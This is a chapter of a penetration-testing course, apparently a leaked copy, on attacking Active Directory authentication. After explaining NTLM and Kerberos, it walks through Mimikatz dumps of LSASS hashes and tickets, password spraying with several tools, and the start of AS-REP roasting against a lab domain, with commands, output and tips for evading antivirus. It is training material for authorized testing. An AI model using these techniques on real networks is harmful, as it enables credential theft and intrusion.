PEN-200
- Courses
- Penetration Testing with Kali Linux
PEN-200: 22. Attacking Active Directory Authentication | Leaked by hide01.ir
22. Attacking Active Directory Authentication
In this Module, we will cover the following Learning Units:
- Understanding Active Directory Authentication
- Performing Attacks on Active Directory Authentication
Having enumerated user accounts, group memberships, and registered Service Principal Names in the previous Module Active Directory Introduction and Enumeration, let's now attempt to use this information to compromise Active Directory.
In this Module, we'll first explore authentication mechanisms of Active Directory (AD) and learn where Windows caches authentication objects such as password hashes and tickets. Next, we'll get familiar with the attack methods targeting these authentication mechanisms. We can use these techniques during different phases of a penetration test to obtain user credentials and access to systems and services. For the purpose of this Module, we'll target the same domain (corp.com) as in the previous Module.
22.1. Understanding Active Directory Authentication
This Learning Unit covers the following Learning Objectives:
- Understand NTLM Authentication
- Understand Kerberos Authentication
- Become familiar with cached AD Credentials
Active Directory supports multiple authentication protocols and techniques that implement authentication to Windows computers as well as those running Linux and macOS.
Active Directory supports several older protocols including WDigest.1 While these may be useful for older operating systems like Windows 7 or Windows Server 2008 R2, we will only focus on more modern authentication protocols in this Learning Unit.
In this Learning Unit, we'll discuss the details of NTLM2 and Kerberos3 authentication. In addition, we'll explore where and how AD credentials are cached on Windows systems.
(Microsoft, 2003), https://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx ↩︎
(Wikipedia, 2022), https://en.wikipedia.org/wiki/NT_LAN_Manager ↩︎
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Kerberos_(protocol) ↩︎
22.1.1. NTLM Authentication
In Password Attacks, we briefly discussed what NTLM is and where to find its hashes. In this section, we'll explore NTLM authentication in the context of Active Directory.
NTLM authentication is used when a client authenticates to a server by IP address (instead of by hostname),1 or if the user attempts to authenticate to a hostname that is not registered on the Active Directory-integrated DNS server. Likewise, third-party applications may choose to use NTLM authentication instead of Kerberos.
The NTLM authentication protocol consists of seven steps:
In the first step, the computer calculates a cryptographic hash, called the NTLM hash, from the user's password. Next, the client computer sends the username to the server, which returns a random value called the nonce or challenge. The client then encrypts the nonce using the NTLM hash, now known as a response, and sends it to the server.
The server forwards the response along with the username and the nonce to the domain controller. The validation is then performed by the domain controller, since it already knows the NTLM hash of all users. The domain controller encrypts the nonce itself with the NTLM hash of the supplied username and compares it to the response it received from the server. If the two are equal, the authentication request is successful.
As with any other cryptographic hash, NTLM cannot be reversed. However, it is considered a fast-hashing algorithm since short passwords can be cracked quickly using modest equipment.2
By using cracking software like Hashcat3 with top-of-the-line graphic processors, it is possible to test over 600 billion NTLM hashes every second. This means that eight-character passwords may be cracked within 2.5 hours and nine-character passwords may be cracked within 11 days.
However, even with its relative weaknesses, completely disabling and blocking NTLM authentication requires extensive planning and preparation4 as it's an important fallback mechanism and used by many third-party applications. Therefore, we'll encounter enabled NTLM authentication in a majority of assessments.
Now that we've briefly covered NTLM authentication, in the next section we'll begin exploring Kerberos. Kerberos is the default authentication protocol in Active Directory and for associated services.
(Microsoft, 2013), https://blogs.msdn.microsoft.com/chiranth/2013/09/20/ntlm-want-to-know-how-it-works/ ↩︎
(Jeremi M Gosney, 2017), https://gist.github.com/epixoip/ace60d09981be09544fdd35005051505 ↩︎
(Hashcat, 2022), https://hashcat.net/hashcat/ ↩︎
(Microsoft Tech Community, 2019), https://techcommunity.microsoft.com/t5/ask-the-directory-services-team/ntlm-blocking-and-you-application-analysis-and-auditing/ba-p/397191 ↩︎
Labs
- What is the name of the cryptographic hash function a computer calculates from the user's password?
- What kind of hashing algorithm is NTLM?
22.1.2. Kerberos Authentication
The Kerberos authentication protocol used by Microsoft is adopted from Kerberos version 5 created by MIT. Kerberos has been used as Microsoft's primary authentication mechanism since Windows Server 2003. While NTLM authentication works via a challenge-and-response paradigm, Windows-based Kerberos authentication uses a ticket system.
A key difference between these two protocols (based on the underlying systems) is that with NTLM authentication, the client starts the authentication process with the application server itself, as discussed in the previous section. On the other hand, Kerberos client authentication involves the use of a domain controller in the role of a Key Distribution Center (KDC).1 The client starts the authentication process with the KDC and not the application server. A KDC service runs on each domain controller and is responsible for session tickets and temporary session keys to users and computers.
The client authentication process at a high level is shown in Figure 2.
Let's review this process in detail. First, when a user logs in to their workstation, an Authentication Server Request (AS-REQ) is sent to the domain controller. The domain controller, acting as a KDC, also maintains the Authentication Server service. The AS-REQ contains a timestamp that is encrypted using a hash derived from the password of the user2 and their username.
When the domain controller receives the request, it looks up the password hash associated with the specific user in the ntds.dit3 file and attempts to decrypt the timestamp. If the decryption process is successful and the timestamp is not a duplicate, the authentication is considered successful.
If the timestamp is a duplicate, it could indicate evidence of a potential replay attack.
Next, the domain controller replies to the client with an Authentication Server Reply (AS-REP). Since Kerberos is a stateless protocol, the AS-REP contains a session key and a Ticket Granting Ticket (TGT). The session key is encrypted using the user's password hash and may be decrypted by the client and then reused. The TGT contains information regarding the user, the domain, a timestamp, the IP address of the client, and the session key.
To avoid tampering, the TGT is encrypted by a secret key (NTLM hash of the krbtgt4 account) known only to the KDC and cannot be decrypted by the client. Once the client has received the session key and the TGT, the KDC considers the client authentication complete. By default, the TGT will be valid for ten hours, after which a renewal occurs. This renewal does not require the user to re-enter their password.
When the user wishes to access resources of the domain, such as a network share or a mailbox, it must again contact the KDC.
This time, the client constructs a Ticket Granting Service Request (TGS-REQ) packet that consists of the current user and a timestamp encrypted with the session key, the name of the resource, and the encrypted TGT.
Next, the ticket-granting service on the KDC receives the TGS-REQ, and if the resource exists in the domain, the TGT is decrypted using the secret key known only to the KDC. The session key is then extracted from the TGT and used to decrypt the username and timestamp of the request. At this point the KDC performs several checks:
- The TGT must have a valid timestamp.
- The username from the TGS-REQ has to match the username from the TGT.
- The client IP address needs to coincide with the TGT IP address.
If this verification process succeeds, the ticket-granting service responds to the client with a Ticket Granting Server Reply (TGS-REP). This packet contains three parts:
- The name of the service for which access has been granted.
- A session key to be used between the client and the service.
- A service ticket containing the username and group memberships along with the newly-created session key.
The service ticket's service name and session key are encrypted using the original session key associated with the creation of the TGT. The service ticket is encrypted using the password hash of the service account registered with the service in question.
Once the authentication process by the KDC is complete and the client has both a session key and a service ticket, the service authentication begins.
First, the client sends the application server an Application Request (AP-REQ), which includes the username and a timestamp encrypted with the session key associated with the service ticket along with the service ticket itself.
The application server decrypts the service ticket using the service account password hash and extracts the username and the session key. It then uses the latter to decrypt the username from the AP-REQ. If the AP-REQ username matches the one decrypted from the service ticket, the request is accepted. Before access is granted, the service inspects the supplied group memberships in the service ticket and assigns appropriate permissions to the user, after which the user may access the requested service.
This protocol may seem complicated and perhaps even convoluted, but it was designed to mitigate various network attacks and prevent the use of fake credentials.
Now that we have discussed the foundations of both NTLM and Kerberos authentication, let's explore various cached credential storage and service account attacks.
(Wikipedia, 2019), https://en.wikipedia.org/wiki/Key_distribution_center ↩︎
(Skip Duckwall, 2014), https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-Kerberos-Sorry-You-Guys-Don't-Get-It-wp.pdf ↩︎
(MITRE ATT&CK, 2022), https://attack.mitre.org/techniques/T1003/003/ ↩︎
(Active Directory Security, 2014), https://adsecurity.org/?p=483 ↩︎
Labs
- What is the name of the request sent when a user logs into their AD-joined machine?
- What is the main authentication protocol used by Active Directory?
- What is the short name of the request sent by the client that encrypts the TGT along with the current user, the target resource, and the timestamp?
22.1.3. Cached AD Credentials
To lay the foundation for cached storage credential attacks and lateral movement vectors in the Module Lateral Movement in Active Directory, we must first discuss the various password hashes used with Kerberos and show how they are stored.
We already covered some of the following information in the Password Attacks Module. In this section, we'll focus on cached credentials and tickets in the context of AD.
Since Microsoft's implementation of Kerberos makes use of single sign-on, password hashes must be stored somewhere in order to renew a TGT request.
In modern versions of Windows, these hashes are stored in the Local Security Authority Subsystem Service (LSASS)1 memory space.2
If we gain access to these hashes, we could crack them to obtain the cleartext password or reuse them to perform various actions.
Although this is the end goal of our AD attack, the process is not as straightforward as it seems. Since the LSASS process is part of the operating system and runs as SYSTEM, we need SYSTEM (or local administrator) permissions to gain access to the hashes stored on a target.
Because of this, we often have to start our attack with a local privilege escalation in order to retrieve the stored hashes. To make things even more tricky, the data structures used to store the hashes in memory are not publicly documented, and they are also encrypted with an LSASS-stored key.
Nevertheless, since the extraction of cached credentials is a large attack vector against Windows and Active Directory, several tools have been created to extract the hashes. The most popular of these tools is Mimikatz.3
Let's try to use Mimikatz to extract domain hashes on our Windows 11 system.
In the following example, we will run Mimikatz as a standalone application. However, due to the mainstream popularity of Mimikatz and well-known detection signatures, consider avoiding using it as a standalone application and use methods discussed in the Antivirus Evasion Module instead. For example, execute Mimikatz directly from memory using an injector like PowerShell,4 or use a built-in tool like Task Manager to dump the entire LSASS process memory,5 move the dumped data to a helper machine, and then load the data into Mimikatz.6
Since the jeff domain user is a local administrator on CLIENT75, we are able to launch a PowerShell prompt with elevated privileges. First, let's connect to this machine as jeff with the password HenchmanPutridBonbon11 over RDP.
kali@kali:~$ xfreerdp /cert-ignore /u:jeff /d:corp.com /p:HenchmanPutridBonbon11 /v:192.168.50.75
Listing 1 - Connecting to CLIENT75 via RDP
Once connected, we start a PowerShell session as Administrator. From this command prompt, we can start Mimikatz7 and enter privilege::debug to engage the SeDebugPrivlege8 privilege, which will allow us to interact with a process owned by another account.
PS C:\Windows\system32> cd C:\Tools
PS C:\Tools\> .\mimikatz.exe
...
mimikatz # privilege::debug
Privilege '20' OK
Listing 2 - Starting Mimikatz and enabling SeDebugPrivilege
Now we can run sekurlsa::logonpasswords to dump the credentials of all logged-on users with the Sekurlsa9 module.
This should dump hashes for all users logged on to the current workstation or server, including remote logins like Remote Desktop sessions.
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 4876838 (00000000:004a6a26)
Session : RemoteInteractive from 2
User Name : jeff
Domain : CORP
Logon Server : DC1
Logon Time : 9/9/2022 12:32:11 PM
SID : S-1-5-21-1987370270-658905905-1781884369-1105
msv :
[00000003] Primary
* Username : jeff
* Domain : CORP
* NTLM : 2688c6d2af5e9c7ddb268899123744ea
* SHA1 : f57d987a25f39a2887d158e8d5ac41bc8971352f
* DPAPI : 3a847021d5488a148c265e6d27a420e6
tspkg :
wdigest :
* Username : jeff
* Domain : CORP
* Password : (null)
kerberos :
* Username : jeff
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
cloudap :
...
Authentication Id : 0 ; 122474 (00000000:0001de6a)
Session : Service from 0
User Name : dave
Domain : CORP
Logon Server : DC1
Logon Time : 9/9/2022 1:32:23 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1103
msv :
[00000003] Primary
* Username : dave
* Domain : CORP
* NTLM : 08d7a47a6f9f66b97b1bae4178747494
* SHA1 : a0c2285bfad20cc614e2d361d6246579843557cd
* DPAPI : fed8536adc54ad3d6d9076cbc6dd171d
tspkg :
wdigest :
* Username : dave
* Domain : CORP
* Password : (null)
kerberos :
* Username : dave
* Domain : CORP.COM
* Password : (null)
ssp :
credman :
cloudap :
...
Listing 3 - Executing Mimikatz on a domain workstation
The output above shows all credential information stored in LSASS for the domain users jeff and dave, including cached hashes.
An effective defensive technique to prevent tools such as Mimikatz from extracting hashes is to enable additional LSA Protection.10 The LSA includes the LSASS process. By setting a registry key, Windows prevents reading memory from this process. We'll discuss how to bypass this and other powerful defensive mechanisms in-depth in OffSec's Evasion Techniques and Breaching Defenses course, PEN-300.
We can observe two types of hashes highlighted in the output above. This will vary based on the functional level of the AD implementation. For AD instances at a functional level of Windows 2003, NTLM is the only available hashing algorithm. For instances running Windows Server 2008 or later, both NTLM and SHA-1 (a common companion for AES encryption) may be available. On older operating systems like Windows 7, or operating systems that have it manually set, WDigest11 will be enabled. When WDigest is enabled, running Mimikatz will reveal cleartext passwords alongside the password hashes.
Armed with these hashes, we could attempt to crack them and obtain the cleartext password as we did in Password Attacks.
A different approach and use of Mimikatz is to exploit Kerberos authentication by abusing TGT and service tickets. As already discussed, we know that Kerberos TGT and service tickets for users currently logged on to the local machine are stored for future use. These tickets are also stored in LSASS, and we can use Mimikatz to interact with and retrieve our own tickets as well as the tickets of other local users.
Let's open a second PowerShell window and list the contents of the SMB share on WEB04 with UNC path \\web04.corp.com\backup. This will create and cache a service ticket.
PS C:\Users\jeff> dir \\web04.corp.com\backup
Directory: \\web04.corp.com\backup
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 9/13/2022 2:52 AM 0 backup_schemata.txt
Listing 4 - Displaying contents of a SMB share
Once we've executed the directory listing on the SMB share, we can use Mimikatz to show the tickets that are stored in memory by entering sekurlsa::tickets.
mimikatz # sekurlsa::tickets
Authentication Id : 0 ; 656588 (00000000:000a04cc)
Session : RemoteInteractive from 2
User Name : jeff
Domain : CORP
Logon Server : DC1
Logon Time : 9/13/2022 2:43:31 AM
SID : S-1-5-21-1987370270-658905905-1781884369-1105
* Username : jeff
* Domain : CORP.COM
* Password : (null)
Group 0 - Ticket Granting Service
[00000000]
Start/End/MaxRenew: 9/13/2022 2:59:47 AM ; 9/13/2022 12:43:56 PM ; 9/20/2022 2:43:56 AM
Service Name (02) : cifs ; web04.corp.com ; @ CORP.COM
Target Name (02) : cifs ; web04.corp.com ; @ CORP.COM
Client Name (01) : jeff ; @ CORP.COM
Flags 40a10000 : name_canonicalize ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
38dba17553c8a894c79042fe7265a00e36e7370b99505b8da326ff9b12aaf9c7
Ticket : 0x00000012 - aes256_hmac ; kvno = 3 [...]
[00000001]
Start/End/MaxRenew: 9/13/2022 2:43:56 AM ; 9/13/2022 12:43:56 PM ; 9/20/2022 2:43:56 AM
Service Name (02) : LDAP ; DC1.corp.com ; corp.com ; @ CORP.COM
Target Name (02) : LDAP ; DC1.corp.com ; corp.com ; @ CORP.COM
Client Name (01) : jeff ; @ CORP.COM ( CORP.COM )
Flags 40a50000 : name_canonicalize ; ok_as_delegate ; pre_authent ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
c44762f3b4755f351269f6f98a35c06115a53692df268dead22bc9f06b6b0ce5
Ticket : 0x00000012 - aes256_hmac ; kvno = 3 [...]
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 9/13/2022 2:43:56 AM ; 9/13/2022 12:43:56 PM ; 9/20/2022 2:43:56 AM
Service Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
Target Name (02) : krbtgt ; CORP.COM ; @ CORP.COM
Client Name (01) : jeff ; @ CORP.COM ( CORP.COM )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000001 - des_cbc_crc
bf25fbd514710a98abaccdf026b5ad14730dd2a170bca9ded7db3fd3b853892a
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
...
Listing 5 - Extracting Kerberos tickets with mimikatz
The output shows both a TGT and a TGS. Stealing a TGS would allow us to access only particular resources associated with those tickets. Alternatively, armed with a TGT, we could request a TGS for specific resources we want to target within the domain. We will discuss how to leverage stolen or forged tickets later on in this and the next Module.
Mimikatz can also export tickets to the hard drive and import tickets into LSASS, which we will explore later.
Before covering attacks on AD authentication mechanisms, let's briefly explore the use of Public Key Infrastructure (PKI)12 in AD. Microsoft provides the AD role Active Directory Certificate Services (AD CS)13 to implement a PKI, which exchanges digital certificates between authenticated users and trusted resources.
If a server is installed as a Certification Authority (CA),14 it can issue and revoke digital certificates (and much more). While a deep discussion on these concepts would require its own Module, let's focus on one aspect of cached and stored objects related to AD CS.
For example, we could issue certificates for web servers to use HTTPS or to authenticate users based on certificates from the CA via Smart Cards.15
These certificates may be marked as having a non-exportable private key16 for security reasons. If so, a private key associated with a certificate cannot be exported even with administrative privileges. However, there are various methods to export the certificate with the private key.
We can rely again on Mimikatz to accomplish this. The crypto17 module contains the capability to either patch the CryptoAPI18 function with crypto::capi19 or KeyIso20 service with crypto::cng,21 making non-exportable keys exportable.
As we've now covered in this section and in Password Attacks, Mimikatz can extract information related to authentication performed through most protocols and mechanisms, making this tool a real Swiss Army knife for cached credentials!
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Local_Security_Authority_Subsystem_Service ↩︎
(Active Directory Security, 2018), https://adsecurity.org/?page_id=1821 ↩︎
(Benjamin Delphy, 2022), https://github.com/gentilkiwi/mimikatz ↩︎
(Matt Graeber, 2016), https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1 ↩︎
(White Oak Security, 2021), https://www.whiteoaksecurity.com/blog/attacks-defenses-dumping-lsass-no-mimikatz/ ↩︎
(Ruben Boonen, 2016), http://www.fuzzysecurity.com/tutorials/18.html ↩︎
(Benjamin Delphu, 2019), https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa ↩︎
(Microsoft, 2022), https://msdn.microsoft.com/en-us/library/windows/desktop/bb530716(v=vs.85).aspx ↩︎
(Mimikatz, 2019), https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa ↩︎
(Microsoft Documentation, 2022), https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection ↩︎
(Microsoft, 2003), https://technet.microsoft.com/en-us/library/cc778868(v=ws.10).aspx ↩︎
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Public_key_infrastructure ↩︎
(Microsoft Documentation, 2022), https://docs.microsoft.com/en-us/training/modules/implement-manage-active-directory-certificate-services/ ↩︎
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Certificate_authority ↩︎
(Wikipedia, 2022), https://en.wikipedia.org/wiki/Smart_card ↩︎
(Microsoft Techcommunity, 2020), https://techcommunity.microsoft.com/t5/core-infrastructure-and-security/marking-private-keys-as-non-exportable-with-certutil-importpfx/ba-p/1128390 ↩︎
(Github Mimikatz Wiki, 2016), https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto ↩︎
(Microsoft Documentation, 2021), https://docs.microsoft.com/en-us/windows/win32/seccrypto/cryptoapi-system-architecture ↩︎
(Github Mimikatz Wiki, 2016), https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto#capi ↩︎
(Revert Service, 2022), http://revertservice.com/10/keyiso/ ↩︎
(Github Mimikatz Wiki, 2016), https://github.com/gentilkiwi/mimikatz/wiki/module-~-crypto#cng ↩︎
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Name (Click to sort ascending) | IP Address | |
|---|---|---|
Attacking Active Directory Authentication - Cached AD Credentials - VM Group 1 Start Attacking Active Directory Authentication - Cached AD Credentials - VM Group 1 with Kali browser access |
22.2. Performing Attacks on Active Directory Authentication
This Learning Unit covers the following Learning Objectives:
- Use password attacks to obtain valid user credentials
- Abuse enabled user account options
- Abuse the Kerberos SPN authentication mechanism
- Forge service tickets
- Impersonate a domain controller to retrieve any domain user credentials
In the previous Learning Unit, we discussed NTLM and Kerberos authentication, as well as where we can find cached AD credentials and objects. In this Learning Unit, we'll explore various attacks in the context of these authentication mechanisms. The attack techniques are introduced independently from each other as they can be used in several different phases of a penetration test. For a majority of attacks, we'll also discuss ways of performing them from Windows and Linux alike, making us more flexible and able to adapt to a variety of real world assessment scenarios.
22.2.1. Password Attacks
In a previous Module, we examined several password attacks on network services and hashed information. Password attacks are also a viable choice in the context of AD to obtain user credentials. In this section, we'll explore various AD password attacks.
Before exploring these attacks, we need to account for one important consideration. When performing a brute force or wordlist authentication attack, we must be aware of account lockouts. Too many failed logins may block the account for further attacks and possibly alert system administrators.
To learn more about account lockouts, let's review the domain's account policy as domain user jeff on CLIENT75. We can connect to the system with the password HenchmanPutridBonbon11 via RDP. Next, we'll open a regular PowerShell window and execute net accounts1 to obtain the account policy.
PS C:\Users\jeff> net accounts
Force user logoff how long after time expires?: Never
Minimum password age (days): 1
Maximum password age (days): 42
Minimum password length: 7
Length of password history maintained: 24
Lockout threshold: 5
Lockout duration (minutes): 30
Lockout observation window (minutes): 30
Computer role: WORKSTATION
The command completed successfully.
Listing 6 - Results of the net accounts command
There's a lot of great information available, but let's first focus on Lockout threshold, which indicates a limit of five login attempts before lockout. This means we can safely attempt four logins before triggering a lockout. Although this may not seem like many, we should also consider the Lockout observation window, which indicates that after thirty minutes after the last failed login, we can make additional attempts.
With these settings, we could attempt 192 logins in a 24-hour period against every domain user without triggering a lockout, assuming the actual users don't fail a login attempt.
An attack like this might consist of compiling a short list of very common passwords and leveraging it against a massive amount of users. Sometimes this type of attack can reveal quite a few weak account passwords in the organization.
However, this would also generate a huge amount of network traffic. Let's review three kinds of password spraying attacks that have a higher chance of success in an AD environment.
The first kind of password spraying attack uses LDAP and ADSI to perform a low and slow password attack against AD users. In the Module Active Directory Introduction and Enumeration, we performed queries against the domain controller as a logged-in user with DirectoryEntry.2 However, we can also make queries in the context of a different user by setting the DirectoryEntry instance.
In the Module Active Directory Introduction and Enumeration, we used the DirectoryEntry constructor without arguments, but we can provide three arguments, including the LDAP path to the domain controller, the username, and the password:
PS C:\Users\jeff> $domainObj = [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
PS C:\Users\jeff> $PDC = ($domainObj.PdcRoleOwner).Name
PS C:\Users\jeff> $SearchString = "LDAP://"
PS C:\Users\jeff> $SearchString += $PDC + "/"
PS C:\Users\jeff> $DistinguishedName = "DC=$($domainObj.Name.Replace('.', ',DC='))"
PS C:\Users\jeff> $SearchString += $DistinguishedName
PS C:\Users\jeff> New-Object System.DirectoryServices.DirectoryEntry($SearchString, "pete", "Nexus123!")
Listing 7 - Authenticating using DirectoryEntry
If the password for the user account is correct, the object creation will be successful, as shown in Listing 8.
distinguishedName : {DC=corp,DC=com}
Path : LDAP://DC1.corp.com/DC=corp,DC=com
Listing 8 - Successfully authenticated with DirectoryEntry
If the password is invalid, no object will be created and we will receive an exception, as shown in Listing 9. To address this, let's change the password in the constructor to WrongPassword. We'll note the clear warning that the user name or password is incorrect.
format-default : The following exception occurred while retrieving member "distinguishedName": "The user name or
password is incorrect.
"
+ CategoryInfo : NotSpecified: (:) [format-default], ExtendedTypeSystemException
+ FullyQualifiedErrorId : CatchFromBaseGetMember,Microsoft.PowerShell.Commands.FormatDefaultCommand
Listing 9 - Incorrect password used with DirectoryEntry
We could use this technique to create a PowerShell script that enumerates all users and performs authentications according to the Lockout threshold and Lockout observation window.
This password spraying tactic is already implemented in the PowerShell script C:\Tools\Spray-Passwords.ps13 on CLIENT75.
The -Pass option allows us to set a single password to test, or we can submit a wordlist file using -File. We can also test admin accounts by adding the -Admin flag. The PowerShell script automatically identifies domain users and sprays a password against them.
PS C:\Users\jeff> cd C:\Tools
PS C:\Tools> powershell -ep bypass
...
PS C:\Tools> .\Spray-Passwords.ps1 -Pass Nexus123! -Admin
WARNING: also targeting admin accounts.
Performing brute force - press [q] to stop the process and print results...
Guessed password for user: 'pete' = 'Nexus123!'
Guessed password for user: 'jen' = 'Nexus123!'
Users guessed are:
'pete' with password: 'Nexus123!'
'jen' with password: 'Nexus123!'
Listing 10 - Using Spray-Passwords to attack user accounts
Nice! The password spraying was successful, providing us two valid sets of credentials with the password Nexus123!.
The second kind of password spraying attack against AD users leverages SMB. This is one of the traditional approaches of password attacks in AD and comes with some drawbacks. For example, for every authentication attempt, a full SMB connection has to be set up and then terminated. As a result, this kind of password attack is very noisy due to the generated network traffic. It is also quite slow in comparison to other techniques.
We can use crackmapexec4 on Kali to perform this kind of password spraying. We'll select smb as protocol and enter the IP address of any domain joined system such as CLIENT75 (192.168.50.75). Then, we can provide a list or single users and passwords to -u and -p. In addition, we will enter the domain name for -d and provide the option --continue-on-success to avoid stopping at the first valid credential. For the purposes of this example, we'll create a text file named users.txt containing a subset of the domain usernames dave, jen, and pete to spray the password Nexus123! against.
kali@kali:~$ cat users.txt
dave
jen
pete
kali@kali:~$ crackmapexec smb 192.168.50.75 -u users.txt -p 'Nexus123!' -d corp.com --continue-on-success
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [-] corp.com\dave:Nexus123! STATUS_LOGON_FAILURE
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\jen:Nexus123!
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\pete:Nexus123!
Listing 11 - Using crackmapexec to attack user accounts
Listing 11 shows that crackmapexec identified the same two valid sets of credentials as Spray-Passwords.ps1 did previously. By prepending the attempted credentials with a plus or minus, crackmapexec indicates whether or not each is valid.
We should note that crackmapexec doesn't examine the password policy of the domain before starting the password spraying. As a result, we should be cautious about locking out user accounts with this method.
As a bonus, however, the output of crackmapexec not only displays if credentials are valid, but also if the user with the identified credentials has administrative privileges on the target system. For example, dave is a local admin on CLIENT75. Let's use crackmapexec with the password Flowers1 targeting this machine.
kali@kali:~$ crackmapexec smb 192.168.50.75 -u dave -p 'Flowers1' -d corp.com
SMB 192.168.50.75 445 CLIENT75 [*] Windows 10.0 Build 22000 x64 (name:CLIENT75) (domain:corp.com) (signing:False) (SMBv1:False)
SMB 192.168.50.75 445 CLIENT75 [+] corp.com\dave:Flowers1 (Pwn3d!)
Listing 12 - Crackmapexec output indicating that the valid credentials have administrative privileges on the target
Listing 12 shows that crackmapexec added Pwn3d! to the output, indicating that dave has administrative privileges on the target system. In an assessment, this is an excellent feature to determine the level of access we have without performing additional enumeration.
The third kind of password spraying attack we'll discuss is based on obtaining a TGT. For example, using kinit5 on a Linux system, we can obtain and cache a Kerberos TGT. We'll need to provide a username and password to do this. If the credentials are valid, we'll obtain a TGT. The advantage of this technique is that it only uses two UDP frames to determine whether the password is valid, as it sends only an AS-REQ and examines the response.
We could use Bash scripting or a programming language of our choice to automate this method. Fortunately, we can also use the tool kerbrute,6 implementing this technique to spray passwords. Since this tool is cross-platform, we can use it on Windows and Linux.
Let's use the Windows version in C:\Tools to perform this attack. To conduct password spraying, we need to specify the passwordspray command along with a list of usernames and the password to spray. We'll also need to enter the domain corp.com as an argument for -d. As previously, we'll create a file named usernames.txt in C:\Tools containing the usernames pete, dave, and jen.
PS C:\Tools> type .\usernames.txt
pete
dave
jen
PS C:\Tools> .\kerbrute_windows_amd64.exe passwordspray -d corp.com .\usernames.txt "Nexus123!"
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 09/06/22 - Ronnie Flathers @ropnop
2022/09/06 20:30:48 > Using KDC(s):
2022/09/06 20:30:48 > dc1.corp.com:88
2022/09/06 20:30:48 > [+] VALID LOGIN: jen@corp.com:Nexus123!
2022/09/06 20:30:48 > [+] VALID LOGIN: pete@corp.com:Nexus123!
2022/09/06 20:30:48 > Done! Tested 3 logins (2 successes) in 0.041 seconds
Listing 13 - Using kerbrute to attack user accounts
Very nice! Listing 13 shows that kerbrute confirmed that the password Nexus123! is valid for pete and jen.
If you receive a network error, make sure that the encoding of usernames.txt is ANSI. You can use Notepad's Save As functionality to change the encoding.
For crackmapexec and kerbrute, we had to provide a list of usernames. To obtain a list of all domain users, we can leverage techniques we learned in the Module Active Directory Introduction and Enumeration or use the built-in user enumeration functions of both tools.
In this section, we explored ways to perform password attacks in the context of AD. We discussed and practiced three different methods for password spraying attacks. These techniques are a great way to obtain valid credentials in the context of AD, especially if there is no lockout threshold set in the account policy. In the next two sections, we'll perform attacks that leverage hash cracking and often provide a higher success rate than password spraying.
(Microsoft Documentation, 2021), https://docs.microsoft.com/en-us/troubleshoot/windows-server/networking/net-commands-on-operating-systems ↩︎
(Microsoft Documentation, 2022), https://docs.microsoft.com/en-us/dotnet/api/system.directoryservices.directoryentry?view=dotnet-plat-ext-6.0 ↩︎
(Improsec, 2016), https://web.archive.org/web/20220225190046/https://github.com/ZilentJack/Spray-Passwords/blob/master/Spray-Passwords.ps1 ↩︎
(Github, 2022), https://github.com/Porchetta-Industries/CrackMapExec ↩︎
(MIT Kerberos Documentation, 2022), https://web.mit.edu/kerberos/krb5-1.12/doc/user/user_commands/kinit.html ↩︎
(Github, 2020), https://github.com/ropnop/kerbrute ↩︎
Resources
Some of the labs require you to start the target machine(s) below.
Please note that the IP addresses assigned to your target machines may not match those referenced in the Module text and video.
Name (Click to sort ascending) | IP Address | |
|---|---|---|
Attacking Active Directory Authentication - Password Attacks - VM Group 1 Start Attacking Active Directory Authentication - Password Attacks - VM Group 1 with Kali browser access |
22.2.2. AS-REP Roasting
As we have discussed, the first step of the authentication process via Kerberos is to send an AS-REQ. Based on this request, the domain controller can validate if the authentication is successful. If it is, the domain controller replies with an AS-REP containing the session key and TGT. This step is also commonly referred to as Kerberos preauthentication1 and prevents offline password guessing.
Without Kerberos preauthentication in place, an attacker could send an AS-REQ to the domain controller on behalf of any AD user. After obtaining the AS-REP from the domain controller, the attacker could perform an offline password attack against the encrypted part of the response. This attack is known as AS-REP Roasting.2
By default, the AD user account option Do not require Kerberos preauthentication is disabled, meaning that Kerberos preauthentication is performed for all users. However, it is possible to enable this account option manually. In assessments, we may find accounts with this option enabled as some applications and technologies require it to function properly.
Let's perform this attack from our Kali machine first, then on Windows. On Kali, we can use impacket-GetNPUsers3 to perform AS-REP roasting. We'll need to enter the IP address of the domain controller as an argument for -dc-ip, the name of the output file in which the AS-REP hash will be stored in Hashcat format for -outputfile, and -request to request the TGT.
Finally, we need to specify the target authentication information in the format domain/user. This is the user we use for authentication. For this example, we'll use pete with the password Nexus123! from the previous section. The complete command is shown below:
kali@kali:~$ impacket-GetNPUsers -dc-ip 192.168.50.70 -request -outputfile hashes.asreproast corp.com/pete
